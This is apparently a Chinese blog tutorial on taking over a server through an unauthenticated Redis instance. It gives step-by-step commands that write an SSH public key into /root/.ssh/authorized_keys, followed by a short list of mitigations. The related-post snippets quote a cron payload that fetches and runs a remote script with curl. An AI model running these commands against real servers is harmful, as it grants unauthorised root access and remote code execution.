通过Redis入侵服务器

最新推荐文章于 2024-08-11 18:55:22 发布
最新推荐文章于 2024-08-11 18:55:22 发布
阅读量6.2k 收藏 14
点赞数 2
分类专栏: 防火墙知识 文章标签: redis 安全 redis入侵服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37886429/article/details/77175745
版权

通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key(也就是密码)。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆

步骤:
一、生成本地ssh公钥

ssh-keygen

二、先连接redis看看

telnet 192.168.88.136 6379
redis-cli -h 192.168.88.136

三、清一下redis数据库

redis-cli -h 192.168.88.136 flushall

四、向redis写自己的公钥

cat id_rsa.pub | redis-cli -h 192.168.88.136 -x set redis

五、利用redis写入到文件中

#连接redis
#redis-cli -h 192.168.88.136
#查看keys
192.168.88.136>keys *
#写入配置库的路径及存放位置
192.168.88.136>CONFIG SET dir /root/.ssh/
#写入配置库名称及存放的名字
192.168.88.136>CONFIG SET dbfilename "authorized_keys"
#写入
192.168.88.136>save
#退出
192.168.88.136>exit

六、远程连接

ssh root@192.168.88.136

注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件,以及redis可以默认的可以随意访问性的。

防止redis入侵服务器的措施:

1、不要对外开放redis,也就是不要使用公网ip启动redis
2、更改redis默认的端口(默认是63793、给reids加密码,在启动的以后,我们必须通过密码认证后才能操作
4、给 authorized_keys 文件加上特殊权限(chattr +i authorized_keys),不让别人在里面写内容
5、也可以给/root/.ssh 这个目录加上特殊权限(chattr +i /root/.ssh),这样即使是root用户也不能够在里面写东西

备注:
如果给redis加了密码以后,我们在启动的时候可以这样 redis-cli -h 192.168.88.136 -p 端口 -a 密码,也可以通过先登陆后认证的方式,也就是redis-cli -h 192.168.88.136 -p 端口 ,认证auth 密码
关闭的时候也一样redis-cli -h 192.168.88.136 -p 端口 -a 密码 shutdown

7*24 工作者
关注
专栏目录
记一次阿里云上Redis服务器入侵的经历
qq_25968703的博客
06-02 3750
欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传 LaTex数学公式 UML序列图和流程图 离线写博客 导入导出Markdown文件 丰富的快捷键 快捷键 加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl
redis导致java的cpu过高,redis 漏洞造成服务器入侵-CPU飙升
weixin_39958631的博客
03-12 627
前言前几天在自己服务器上搭了redis,准备想着大展身手一番,昨天使用redis-cli命令的时候,10s后,显示进程已杀死。然后又试了几次,都是一样的结果,10s时间,进程被杀死。这个时候我还没发现事情的严重性。发现问题进程莫名被杀死,可能是cpu被占满,赶紧看了一下cpu。[root@vm_0_13_centos etc]# top果然如此,cpu被莫名的占满了。简单,根据pid杀死进程就行了...
redis之手入侵服务器
运维724
03-07 400
说明 利用redis端口暴露公网,且没有设置密码,能轻松入侵linux 服务器。 原理 远程连接redis,修改redis数据目录及文件为linux计划任务的目录,设置xx 键的值为计划任务,save数据后将会把该值写入计划任务文件,计划任务命令中可以执行任意脚本。 入侵演示 1. 编译安装并配置 redis免密码,允许外部连接。主要修改以下参数,其他参数默认即可 bind 0.0.0.0 #允...
利用redis入侵服务器
weixin_43641575的博客
01-17 709
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。 一,生成本地ssh公钥 ssh-keygen 最后在/root/.ssh/id_rsa.pub这个文件里面 二,先连接redis看看 telnet 10.10.10.102 6379...
Redis漏洞大全~讲解最全的漏洞利用方法
最新发布
weixin_67832625的博客
08-11 1035
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。漏洞原理。
有人通过 Redis 攻陷了我的服务器...
fdl123456的博客
01-10 713
预计阅读时间:5 分钟好吧,我也做了回标题党,像我这么细心的同学,怎么可能让服务器入侵呢?其实是这样的,昨天我和一个朋友聊天,他说他自己有一台云服务器运行了 Redis 数据库,有一天...
redis被黑客入侵
程序员陆通
02-12 1487
[root@iZ112fail84Z home]# redis-cli 127.0.0.1:6379> keys * 1) “crackit” 127.0.0.1:6379> get crackit “\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n”这个程序每5分钟执行一个shell
Redis服务入侵
一枚小白的分享,不喜勿喷~
08-22 926
百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis因配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等。
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1462
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
redis 入侵
Henry_Wu001的专栏
07-22 248
redis 入侵
记录一下五天前的晚上阿里云服务器redis入侵的经历
weixin_43938739的博客
05-17 820
我是个普通大二学生,最近做项目需要部署到服务器上,于是我月初在阿里云买了个小服务器,安装好jdk,tomcat,mysql,redis就没管了,第一次弄服务器,没什么经验,当时漏洞我没管,打算有空再搞.redis密码也没设置(太蠢了),端口还是默认的6379对外网开放. 就这么相安无事过了7天吧,那天晚上还在打游戏,看到阿里云发来的短信心头一紧,马上上去看,被入侵了,查了一会,发现是挖矿木马,就是如下这种 https://zhuanlan.zhihu.com/p/54610161 我上来就登录redis f
渗透服务器修改数据,渗透测试之:从端口入侵服务器
weixin_42617406的博客
07-31 1981
Web应用服务端口渗透HTTP服务:对于http服务其实是我们目前这几年比较常见的攻击入口,所以这里会针对http服务进行一个详细的详解;注:这个板块的所有攻击方式,如果涉及到常规的web漏洞不会提出来,除非是特定的服务器才会产生的漏洞;IIS服务默认端口:80/81/443攻击方式:IISPUT写文件:利用IIS漏洞,put方法直接将文件放置到服务器上短文件名泄漏:这种一般没啥影响解析漏洞:详细...
阿里云服务器搭建redis-6.2.6集群
qq_47067442的博客
11-20 1071
由于资源有限,文章以搭建伪集群为例,即以单个服务不同的端口搭建redis集群,实现在公网可以直接访问 1.新建redis集群安装目录,并且在每个目录下新建data目录,用于保存redis数据 mkdir /usr/local/redis-cluster/redis-500{1,2,3} 2.从官网https://redis.io/download下载Redisredis-6.2.6 wget https://download.redis.io/releases/redis-6.2.6.tar.
linux 连接redis_借redis之手入侵服务器
weixin_39647734的博客
11-26 154
说明利用redis端口暴露公网,且没有设置密码,能轻松入侵linux 服务器。原理远程连接redis,修改redis数据目录及文件为linux计划任务的目录,设置xx 键的值为计划任务,save数据后将会把该值写入计划任务文件,计划任务命令中可以执行任意脚本。入侵演示#### 1. 编译安装并配置 redis免密码,允许外部连接。主要修改以下参数,其他参数默认即可bind 0.0.0.0 #允...
H2Miner变种,利用Redis漏洞入侵服务器wa矿
热门推荐
China Honker 博客
01-12 114万+
H2Miner变种木马入侵后会下载挖矿木马,通过安装定时任务持久化,通过SSH复用连接进行横向移动感染。该程序由GO语言开发,通过还原后的函数名进行对比,可知其是H2Miner此前的kinsing文件变种,并且与http[:]//45.10.88.124/kinsing下载得到的文件一致。Redis 4.x/5.x 版本存在主从同步命令执行漏洞(CNVD-2019-21763),攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,该漏洞风险较高,且漏洞利用方式已被公开。
Redis 阿里云服务器遭遇攻击
mrathena
11-20 1827
博文目录 文章目录攻击提醒查看异常638063796381补救操作系统操作Redis添加密码认证残留问题 攻击提醒 通过描述来看, 我的服务器被挂马, 一直在尝试攻击别人服务器的6379端口, 阿里云一定时限内禁止我访问其他服务器的6379端口 我估计是因为我的Redis使用了默认的6379端口, 且没有设置密码, 且开放了一堆端口到公网, 且使用的是root账户, 被人扫到了, 然后通过漏洞做了不好的事情, 我是Linux小白, 只能百度看看有什么查漏补缺的措施了 查看异常 执行top发现有两个进程占
记一次 LINUX 挖矿病毒 networkservice 分析 原因通过redis入侵
球球的博客
12-06 2199
单位ip被电信拉黑,原因恶意访问非法目的地; 通过安全防护软件分析一台服务器不断向国外不同国家发包请求;定位到服务器 192.168.2.110 登陆服务器一看cpu 爆满; 看是服务networkservice;不知所以然;百度一下 发现有同学已经中招了 定位是 挖矿病毒 networkservice; 清除的过程 使用top已经知道了进程号,接下来看看位置,命令ls -l pro...
redis 安全漏洞导致服务器被攻击
Golden_lion的博客
03-01 3903
近日发现redis数据无故被清,恢复后连续几次还是被清,由于经验不足,一直认为是自己配置有误。经过多天查找,才发现2015年11月份爆发了redis安全漏洞攻击事件,一一印证了下,全部中招。 特点: 1.redis缓存被清0;而且每天会执行一次; 2./root/.ssh/ 下多了几个文件。dump.rdb, foo.txt, authorized_keys里多了莫名
【实战记录】记录服务器遭到攻击全过程(Redis漏洞)
qq_41997592的博客
02-13 3574
第一次面对服务器攻击全过程,由被动到主动!!
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值